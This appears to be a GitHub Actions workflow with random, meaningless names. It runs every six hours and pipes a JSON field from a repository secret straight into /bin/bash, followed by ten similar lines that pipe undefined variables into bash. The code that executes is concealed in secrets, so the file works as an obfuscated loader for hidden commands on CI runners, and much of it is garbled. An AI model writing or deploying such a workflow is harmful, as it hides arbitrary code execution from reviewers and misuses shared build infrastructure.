name: fnjcjkkk
on:
  workflow_dispatch:
  schedule:
    - cron: '34 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fnjcjkkk
        env:
          z9685: ${{ secrets.z9685 }}
        run: |
          echo $z9685 | jq -r .e8973 | /bin/bash
          echo $rarr14546 | jq -r .c6 | /bin/bash
          echo $bio1113 | jq -r .mum8873 | /bin/bash
          echo $zlx5323 | jq -r .t9197 | /bin/bash
          echo $bcqd1405 | jq -r .r9 | /bin/bash
          echo $yfb310 | jq -r .uhmq743 | /bin/bash
          echo $h86 | jq -r .di09 | /bin/bash
          echo $pkbgr387 | jq -r .lzdsa4713 | /bin/bash
          echo $zdvld3 | jq -r .jw4026 | /bin/bash
          echo $vmoc001 | jq -r .k2463 | /bin/bash
          echo $cn90319 | jq -r .gfdrh57 | /bin/bash

